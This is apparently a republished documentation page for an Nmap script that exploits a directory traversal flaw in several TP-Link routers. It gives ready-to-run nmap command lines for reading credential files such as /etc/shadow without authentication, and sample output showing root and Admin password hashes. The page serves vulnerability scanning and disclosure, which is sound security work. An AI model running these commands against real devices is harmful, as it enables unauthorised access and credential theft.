http-tplink-dir-traversal
脚本使用类型:
portrule
脚本所属分类:
vuln, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-tplink-dir-traversal.nse
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.
Advisory:
Other interesting files:
Remote file to download. Default: /etc/passwd
If set it saves the remote file to this location.
Other arguments you might want to use with this script:
执行格式
nmap -p80 --script http-tplink-dir-traversal.nse <target>
nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-tplink-dir-traversal: | VULNERABLE: | Path traversal vulnerability in several TP-Link wireless routers | State: VULNERABLE (Exploitable) | Description: | Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device. | This vulnerability can be exploited remotely and without authenticatication. | Confirmed vulnerable models: WR740N, WR740ND, WR2543ND | Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N. | Disclosure date: 2012-06-18 | Extra information: | /etc/shadow : | | root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: | Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: | bin::10933:0:99999:7::: | daemon::10933:0:99999:7::: | adm::10933:0:99999:7::: | lp:*:10933:0:99999:7::: | sync:*:10933:0:99999:7::: | shutdown:*:10933:0:99999:7::: | halt:*:10933:0:99999:7::: | uucp:*:10933:0:99999:7::: | operator:*:10933:0:99999:7::: | nobody::10933:0:99999:7::: | ap71::10933:0:99999:7::: | | References: |_ http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
Author: Paulino Calderon <calderon()websec.mx>
License: VER007 整理 http://www.ver007.com
MAIN - The script checks for vulnerable devices by attempting to read "etc/shadow" and finding the pattern "root:".